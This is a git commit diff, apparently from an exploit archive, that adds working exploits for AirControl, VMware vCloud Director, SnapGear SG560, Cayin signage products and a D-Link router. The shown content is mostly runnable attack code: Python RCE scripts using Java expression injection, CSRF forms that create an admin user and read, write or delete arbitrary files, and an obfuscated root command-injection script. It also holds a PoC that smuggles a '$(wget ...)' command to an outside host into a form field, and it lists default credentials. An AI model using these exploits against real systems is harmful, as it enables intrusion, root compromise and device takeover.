DB: 2020-06-05
17 changes to exploits/shellcodes IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path AirControl 1.4.2 - PreAuth Remote Code Execution Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) Clinic Management System 1.0 - Unauthenticated Remote Code Execution Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) Oriol Espinal CMS 1.0 - 'id' SQL Injection Clinic Management System 1.0 - Authenticated Arbitrary File Upload Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution Navigate CMS 2.8.7 - Authenticated Directory Traversal D-Link DIR-615 T1 20.10 - CAPTCHA Bypass Online Marriage Registration System 1.0 - Remote Code Execution Cayin Content Management Server 11.0 - Remote Command Injection (root) SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read Cayin Signage Media Player 3.0 - Remote Command Injection (root) Cayin Digital Signage System xPost 2.5 - Remote Command Injection
This commit is contained in:
parent
dfb79e06a1
commit
533f33f3f4
18 changed files with 1257 additions and 0 deletions
30
exploits/hardware/webapps/48541.py
Executable file
30
exploits/hardware/webapps/48541.py
Executable file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
|
||||
# Date: 2020-06-03
|
||||
# Exploit Author: 0xd0ff9 vs j3ssie
|
||||
# Vendor Homepage: https://www.ui.com/
|
||||
# Software Link: https://www.ui.com/download/#!utilities
|
||||
# Version: AirControl <= 1.4.2
|
||||
# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml
|
||||
|
||||
import requests
|
||||
import re
|
||||
import urllib
|
||||
import sys
|
||||
|
||||
|
||||
print """USAGE: python exploit_aircontrol.py [url] [cmd]"""
|
||||
|
||||
|
||||
url = sys.argv[1]
|
||||
cmd = sys.argv[2]
|
||||
|
||||
|
||||
burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}"
|
||||
burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}
|
||||
r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)
|
||||
|
||||
Locat = r.headers["Location"]
|
||||
|
||||
res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1)
|
||||
|
||||
print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)
|
28
exploits/hardware/webapps/48551.txt
Normal file
28
exploits/hardware/webapps/48551.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
|
||||
# Date: 2019-10-12
|
||||
# Exploit Author: huzaifa hussain
|
||||
# Vendor Homepage: https://in.dlink.com/
|
||||
# Version: DIR-615 T1 ver:20.10
|
||||
# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
|
||||
# CVE: CVE-2019-17525
|
||||
|
||||
D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
|
||||
|
||||
A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING.
|
||||
|
||||
------------------------------------
|
||||
D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new.
|
||||
|
||||
ATTACK SCENARIO AND REPRODUCTION STEPS
|
||||
|
||||
1: Find the ROUTER LoginPage.
|
||||
2: Fill the required login credentials.
|
||||
3: Fill the CAPTCH properly and Intercept the request in Burpsuit.
|
||||
4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab
|
||||
5: Set the payloads on target variables i.e. username & password under Payloads Tab.
|
||||
5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab.
|
||||
6: Now hit the start attack and you will find the correct credentials.
|
||||
|
||||
-------------------------------------
|
||||
|
||||
Huzaifa Hussain
|
72
exploits/hardware/webapps/48554.txt
Normal file
72
exploits/hardware/webapps/48554.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)
|
||||
# Author: LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: http://www.securecomputing.com
|
||||
# CVE: N/A
|
||||
|
||||
Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User
|
||||
|
||||
|
||||
Vendor: Secure Computing Corp.
|
||||
Product web page: http://www.securecomputing.com
|
||||
Affected version: 3.1.5u1
|
||||
|
||||
Summary: The SG gateway appliance range provides Internet security and
|
||||
privacy of communications for small and medium enterprises, and branch
|
||||
offices. It simply and securely connects your office to the Internet,
|
||||
and with its robust stateful firewall, shields your computers from
|
||||
external threats.
|
||||
|
||||
Desc: The application interface allows users to perform certain actions
|
||||
via HTTP requests without performing any validity checks to verify the
|
||||
requests. This can be exploited to perform certain actions with administrative
|
||||
privileges if a logged-in user visits a malicious web site.
|
||||
|
||||
Tested on: fnord/1.9
|
||||
Apache 1.3.27 (Unix)
|
||||
Linux 2.4.31
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5567
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php
|
||||
|
||||
|
||||
14.05.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
CSRF Add Super User:
|
||||
--------------------
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST">
|
||||
<input type="hidden" name=".form" value="edit" />
|
||||
<input type="hidden" name=".page" value="adminusers_edit" />
|
||||
<input type="hidden" name="login" value="testingus" />
|
||||
<input type="hidden" name="fullname" value="ZSL" />
|
||||
<input type="hidden" name="password" value="123456" />
|
||||
<input type="hidden" name="confirm" value="123456" />
|
||||
<input type="hidden" name="acl.login" value="on" />
|
||||
<input type="hidden" name="acl.admin" value="on" />
|
||||
<input type="hidden" name="acl.diags" value="on" />
|
||||
<input type="hidden" name="acl.saverestore" value="on" />
|
||||
<input type="hidden" name="acl.setpassword" value="on" />
|
||||
<input type="hidden" name="finish" value="Finish" />
|
||||
<input type="hidden" name=".defaultname" value="finish" />
|
||||
<input type="submit" value="Idemo" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Result /etc/shadow:
|
||||
|
||||
root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh
|
||||
sshd:!!:100:65534::/home:/bin/false
|
||||
clamav:!!:103:65534::/home:/bin/false
|
||||
testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh
|
95
exploits/hardware/webapps/48556.txt
Normal file
95
exploits/hardware/webapps/48556.txt
Normal file
|
@ -0,0 +1,95 @@
|
|||
# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: http://www.securecomputing.com
|
||||
# CVE: N/A
|
||||
|
||||
Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write
|
||||
|
||||
|
||||
Vendor: Secure Computing Corp.
|
||||
Product web page: http://www.securecomputing.com
|
||||
Affected version: 3.1.5u1
|
||||
|
||||
Summary: The SG gateway appliance range provides Internet security and
|
||||
privacy of communications for small and medium enterprises, and branch
|
||||
offices. It simply and securely connects your office to the Internet,
|
||||
and with its robust stateful firewall, shields your computers from
|
||||
external threats.
|
||||
|
||||
Desc: The application allows the currently logged-in user to edit the
|
||||
configuration files in the system using the CGI executable 'edit_config_files'
|
||||
in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete)
|
||||
are located in the /etc/config/ directory. An attacker can manipulate
|
||||
the POST request parameters to escape from the restricted environment
|
||||
by using absolute path and start reading, writing and deleting arbitrary
|
||||
files on the system.
|
||||
|
||||
Tested on: fnord/1.9
|
||||
Apache 1.3.27 (Unix)
|
||||
Linux 2.4.31
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5568
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php
|
||||
|
||||
|
||||
14.05.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
Read:
|
||||
-----
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
|
||||
<input type="hidden" name=".form" value="choices" />
|
||||
<input type="hidden" name=".page" value="select_file" />
|
||||
<input type="hidden" name="name$1337" value="/var/log/messages" />
|
||||
<input type="hidden" name="modify$1337" value="1" />
|
||||
<input type="hidden" name=".defaultname" value="newitem" />
|
||||
<input type="submit" value="Read" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Write/overwrite/move:
|
||||
---------------------
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
|
||||
<input type="hidden" name=".form" value="edit" />
|
||||
<input type="hidden" name=".page" value="edit_file" />
|
||||
<input type="hidden" name="enabled$0" value="" />
|
||||
<input type="hidden" name="name$0" value="/etc/motd" />
|
||||
<input type="hidden" name="mode$0" value="" />
|
||||
<input type="hidden" name="filename" value="/etc/motd" />
|
||||
<input type="hidden" name="filecontents" value="pwned" />
|
||||
<input type="hidden" name="finish" value="Finish" />
|
||||
<input type="hidden" name=".defaultname" value="finish" />
|
||||
<input type="submit" value="Write" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Delete:
|
||||
-------
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
|
||||
<input type="hidden" name=".form" value="choices" />
|
||||
<input type="hidden" name=".page" value="select_file" />
|
||||
<input type="hidden" name="name$251" value="/root/.secret" />
|
||||
<input type="hidden" name="delete$251" value="1" />
|
||||
<input type="hidden" name=".defaultname" value="newitem" />
|
||||
<input type="submit" value="Delete" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
138
exploits/java/webapps/48549.py
Executable file
138
exploits/java/webapps/48549.py
Executable file
|
@ -0,0 +1,138 @@
|
|||
# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
|
||||
# Exploit Author: Tomas Melicher
|
||||
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
|
||||
# Date: 2020-05-24
|
||||
# Vendor Homepage: https://www.vmware.com/
|
||||
# Software Link: https://www.vmware.com/products/cloud-director.html
|
||||
# Tested On: vCloud Director 9.7.0.15498291
|
||||
# Vulnerability Description:
|
||||
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import argparse # pip install argparse
|
||||
import base64, os, re, requests, sys
|
||||
if sys.version_info >= (3, 0):
|
||||
from urllib.parse import urlparse
|
||||
else:
|
||||
from urlparse import urlparse
|
||||
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
|
||||
session = requests.Session()
|
||||
|
||||
def login(url, username, password, verbose):
|
||||
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
|
||||
res = session.get(target_url)
|
||||
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
|
||||
if match:
|
||||
tenant = match.group(1)
|
||||
else:
|
||||
print('[!] can\'t find tenant identifier')
|
||||
return
|
||||
|
||||
if verbose:
|
||||
print('[*] tenant: %s'%(tenant))
|
||||
|
||||
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
|
||||
if match: # Cloud Director 9.*
|
||||
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
|
||||
res = session.post(login_url, data={'username':username,'password':password})
|
||||
if res.status_code == 401:
|
||||
print('[!] invalid credentials')
|
||||
return
|
||||
else: # Cloud Director 10.*
|
||||
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
|
||||
if match:
|
||||
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
|
||||
headers = {
|
||||
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
|
||||
'Accept': 'application/json;version=29.0',
|
||||
'Content-type': 'application/json;version=29.0'
|
||||
}
|
||||
res = session.post(login_url, headers=headers)
|
||||
if res.status_code == 401:
|
||||
print('[!] invalid credentials')
|
||||
return
|
||||
else:
|
||||
print('[!] url for login form was not found')
|
||||
return
|
||||
|
||||
cookies = session.cookies.get_dict()
|
||||
jwt = cookies['vcloud_jwt']
|
||||
session_id = cookies['vcloud_session_id']
|
||||
|
||||
if verbose:
|
||||
print('[*] jwt token: %s'%(jwt))
|
||||
print('[*] session_id: %s'%(session_id))
|
||||
|
||||
res = session.get(target_url)
|
||||
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
|
||||
if match is None:
|
||||
print('[!] organization not found')
|
||||
return
|
||||
organization = match.group(1)
|
||||
if verbose:
|
||||
print('[*] organization name: %s'%(organization))
|
||||
|
||||
match = re.search(r'orgId : \'([^\']+)', res.content)
|
||||
if match is None:
|
||||
print('[!] orgId not found')
|
||||
return
|
||||
org_id = match.group(1)
|
||||
if verbose:
|
||||
print('[*] organization identifier: %s'%(org_id))
|
||||
|
||||
return (jwt,session_id,organization,org_id)
|
||||
|
||||
|
||||
def exploit(url, username, password, command, verbose):
|
||||
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
|
||||
|
||||
headers = {
|
||||
'Accept': 'application/*+xml;version=29.0',
|
||||
'Authorization': 'Bearer %s'%jwt,
|
||||
'x-vcloud-authorization': session_id
|
||||
}
|
||||
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
|
||||
res = session.get(admin_url, headers=headers)
|
||||
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
|
||||
if match:
|
||||
version = match.group(1)
|
||||
if verbose:
|
||||
print('[*] detected version of Cloud Director: %s'%(version))
|
||||
else:
|
||||
version = None
|
||||
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
|
||||
|
||||
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
|
||||
|
||||
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
|
||||
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
|
||||
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
|
||||
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
|
||||
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
|
||||
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
|
||||
res = session.put(email_settings_url, data=data, headers=headers)
|
||||
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
|
||||
|
||||
if verbose:
|
||||
print('')
|
||||
try:
|
||||
print(base64.b64decode(match.group(1)))
|
||||
except Exception:
|
||||
print(res.content)
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
|
||||
parser.add_argument('-v', action='store_true')
|
||||
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
|
||||
parser.add_argument('-u', metavar='username', required=True)
|
||||
parser.add_argument('-p', metavar='password', required=True)
|
||||
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
|
||||
args = parser.parse_args()
|
||||
|
||||
url = urlparse(args.t)
|
||||
exploit(url, args.u, args.p, args.c, args.v)
|
139
exploits/multiple/webapps/48553.txt
Normal file
139
exploits/multiple/webapps/48553.txt
Normal file
|
@ -0,0 +1,139 @@
|
|||
# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root)
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: https://www.cayintech.com
|
||||
# CVE: N/A
|
||||
Cayin Content Management Server 11.0 Root Remote Command Injection
|
||||
|
||||
|
||||
Vendor: CAYIN Technology Co., Ltd.
|
||||
Product web page: https://www.cayintech.com
|
||||
Affected version: CMS-SE v11.0 Build 19179
|
||||
CMS-SE v11.0 Build 19025
|
||||
CMS-SE v11.0 Build 18325
|
||||
CMS Station (CMS-SE-LXC)
|
||||
CMS-60 v11.0 Build 19025
|
||||
CMS-40 v9.0 Build 14197
|
||||
CMS-40 v9.0 Build 14099
|
||||
CMS-40 v9.0 Build 14093
|
||||
CMS-20 v9.0 Build 14197
|
||||
CMS-20 v9.0 Build 14092
|
||||
CMS v8.2 Build 12199
|
||||
CMS v8.0 Build 11175
|
||||
CMS v7.5 Build 11175
|
||||
|
||||
Summary: CAYIN Technology provides Digital Signage
|
||||
solutions, including media players, servers, and
|
||||
software designed for the DOOH (Digital Out-of-home)
|
||||
networks. We develop industrial-grade digital signage
|
||||
appliances and tailored services so you don't have
|
||||
to do the hard work.
|
||||
|
||||
Desc: CAYIN CMS suffers from an authenticated OS
|
||||
semi-blind command injection vulnerability using
|
||||
default credentials. This can be exploited to inject
|
||||
and execute arbitrary shell commands as the root
|
||||
user through the 'NTP_Server_IP' HTTP POST parameter
|
||||
in system.cgi page.
|
||||
|
||||
Tested on: Apache/1.3.42 (Unix)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5570
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
|
||||
|
||||
|
||||
15.05.2020
|
||||
|
||||
---
|
||||
|
||||
|
||||
Session created with default credentials (webadmin:bctvadmin).
|
||||
|
||||
HTTP POST Request:
|
||||
-----------------
|
||||
|
||||
POST /cgi-bin/system.cgi HTTP/1.1
|
||||
Host: 192.168.1.3
|
||||
Content-Length: 201
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Smith
|
||||
Origin: http://192.168.1.3
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://192.168.1.3/cgi-bin/system.cgi
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
|
||||
Connection: close
|
||||
|
||||
|
||||
save_system: 1
|
||||
system_date: 2020/5/16 06:36:48
|
||||
TIMEZONE: 49
|
||||
NTP_Service: 1
|
||||
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
|
||||
TEST_NTP: 測試
|
||||
reboot1: 1
|
||||
reboot_sel1: 4
|
||||
reboot_sel2: 1
|
||||
reboot_sel3: 1
|
||||
font_list: ZH_TW
|
||||
|
||||
|
||||
Request recorder @ ZSL:
|
||||
-----------------------
|
||||
|
||||
Origin of HTTP request: 192.168.1.3:61347
|
||||
HTTP GET request to vrfy.zeroscience.mk:
|
||||
|
||||
GET / HTTP/1.0
|
||||
User-Agent: MyVoiceIsMyPassportVerifyMe
|
||||
Host: vrfy.zeroscience.mk
|
||||
Accept: */*
|
||||
Connection: Keep-Alive
|
||||
|
||||
|
||||
PoC script:
|
||||
-----------
|
||||
|
||||
import requests
|
||||
|
||||
url = "http://192.168.1.3:80/cgi-bin/system.cgi"
|
||||
|
||||
cookies = {"cy_lang": "ZH_TW",
|
||||
"cy_us": "67176fd7d3d05812008",
|
||||
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
|
||||
"WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
|
||||
"WEB_STR_SYSTEM": "SYSTEM_SETTING",
|
||||
"cy_cgi_tp": "1591206269_15957"}
|
||||
|
||||
headers = {"Cache-Control": "max-age=0",
|
||||
"Origin": "http://192.168.1.3",
|
||||
"Content-Type": "application/x-www-form-urlencoded",
|
||||
"User-Agent": "Smith",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Referer": "http://192.168.1.3/cgi-bin/system.cgi",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"}
|
||||
|
||||
data = {"save_system": "1",
|
||||
"system_date": "2020/5/16 06:36:48",
|
||||
"TIMEZONE": "49",
|
||||
"NTP_Service": "1",
|
||||
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
|
||||
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
|
||||
"reboot1": "1",
|
||||
"reboot_sel1": "4",
|
||||
"reboot_sel2": "1",
|
||||
"reboot_sel3": "1",
|
||||
"font_list": "ZH_TW"}
|
||||
|
||||
requests.post(url, headers=headers, cookies=cookies, data=data)
|
130
exploits/multiple/webapps/48557.py
Executable file
130
exploits/multiple/webapps/48557.py
Executable file
|
@ -0,0 +1,130 @@
|
|||
# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: https://www.cayintech.com
|
||||
# CVE: N/A
|
||||
|
||||
#!/usr/bin/env python3
|
||||
#
|
||||
#
|
||||
# Cayin Signage Media Player 3.0 Root Remote Command Injection
|
||||
#
|
||||
#
|
||||
# Vendor: CAYIN Technology Co., Ltd.
|
||||
# Product web page: https://www.cayintech.com
|
||||
# Affected version: SMP-8000QD v3.0
|
||||
# SMP-8000 v3.0
|
||||
# SMP-6000 v3.0 Build 19025
|
||||
# SMP-6000 v1.0 Build 14246
|
||||
# SMP-6000 v1.0 Build 14199
|
||||
# SMP-6000 v1.0 Build 14167
|
||||
# SMP-6000 v1.0 Build 14097
|
||||
# SMP-6000 v1.0 Build 14090
|
||||
# SMP-6000 v1.0 Build 14069
|
||||
# SMP-6000 v1.0 Build 14062
|
||||
# SMP-4000 v1.0 Build 14098
|
||||
# SMP-4000 v1.0 Build 14092
|
||||
# SMP-4000 v1.0 Build 14087
|
||||
# SMP-2310 v3.0
|
||||
# SMP-2300 v3.0 Build 19316
|
||||
# SMP-2210 v3.0 Build 19025
|
||||
# SMP-2200 v3.0 Build 19029
|
||||
# SMP-2200 v3.0 Build 19025
|
||||
# SMP-2100 v10.0 Build 16228
|
||||
# SMP-2100 v3.0
|
||||
# SMP-2000 v1.0 Build 14167
|
||||
# SMP-2000 v1.0 Build 14087
|
||||
# SMP-1000 v1.0 Build 14099
|
||||
# SMP-PROPLUS v1.5 Build 10081
|
||||
# SMP-WEBPLUS v6.5 Build 11126
|
||||
# SMP-WEB4 v2.0 Build 13073
|
||||
# SMP-WEB4 v2.0 Build 11175
|
||||
# SMP-WEB4 v1.5 Build 11476
|
||||
# SMP-WEB4 v1.5 Build 11126
|
||||
# SMP-WEB4 v1.0 Build 10301
|
||||
# SMP-300 v1.0 Build 14177
|
||||
# SMP-200 v1.0 Build 13080
|
||||
# SMP-200 v1.0 Build 12331
|
||||
# SMP-PRO4 v1.0
|
||||
# SMP-NEO2 v1.0
|
||||
# SMP-NEO v1.0
|
||||
#
|
||||
# Summary: CAYIN Technology provides Digital Signage
|
||||
# solutions, including media players, servers, and
|
||||
# software designed for the DOOH (Digital Out-of-home)
|
||||
# networks. We develop industrial-grade digital signage
|
||||
# appliances and tailored services so you don't have
|
||||
# to do the hard work.
|
||||
#
|
||||
# Desc: CAYIN SMP-xxxx suffers from an authenticated
|
||||
# OS command injection vulnerability using default
|
||||
# credentials. This can be exploited to inject and
|
||||
# execute arbitrary shell commands as the root user
|
||||
# through the 'NTP_Server_IP' HTTP GET parameter in
|
||||
# system.cgi and wizard_system.cgi pages.
|
||||
#
|
||||
# -----------------------------------------------------
|
||||
# $ ./cayin.py 192.168.1.2 id
|
||||
# uid=0(root) gid=65534(guest)
|
||||
# # start sshd
|
||||
# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd
|
||||
# $
|
||||
# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'"
|
||||
# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
|
||||
# tcp 0 0 :::22 :::* LISTEN
|
||||
# $ ./cayin.py 192.168.1.2 "cat /etc/passwd"
|
||||
# root:x:0:0:root:/root:/bin/bash
|
||||
# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
|
||||
# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
|
||||
# sshd:x:1000:0::/dev/null:/sbin/nologin
|
||||
# $
|
||||
# -----------------------------------------------------
|
||||
#
|
||||
# Tested on: CAYIN Technology KT-Linux v0.99
|
||||
# Apache/1.3.42 (Unix)
|
||||
# Apache/1.3.41 (Unix)
|
||||
# PHP/5.2.5
|
||||
# Linux 2.6.37
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5569
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
|
||||
#
|
||||
#
|
||||
# 15.05.2020
|
||||
#
|
||||
|
||||
import requests
|
||||
import sys#____
|
||||
import re#_____
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
print("Cayin SMP WebManager Post-Auth RCE")
|
||||
print("Usage: ./cayin.py [ip] [cmd]")
|
||||
sys.exit(17)
|
||||
else:
|
||||
ip____address = sys.argv[1]
|
||||
ex____command = sys.argv[2]
|
||||
|
||||
ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f"
|
||||
ur____identif += (bytes(ip____address, "utf-8"))
|
||||
ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
|
||||
ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
|
||||
ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
|
||||
ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
|
||||
ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
|
||||
ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
|
||||
ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
|
||||
ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
|
||||
ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
|
||||
ur____identif += b"\x67\x25\x32\x36" ##########"
|
||||
ur____identif += (bytes(ex____command, "utf-8"))
|
||||
ur____identif += b"\x25\x32\x36" ##############"
|
||||
|
||||
ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
|
||||
re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
|
||||
print(re____outputs)
|
121
exploits/multiple/webapps/48558.txt
Normal file
121
exploits/multiple/webapps/48558.txt
Normal file
|
@ -0,0 +1,121 @@
|
|||
# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: https://www.cayintech.com
|
||||
# CVE: N/A
|
||||
|
||||
#!/usr/bin/env python3
|
||||
#
|
||||
#
|
||||
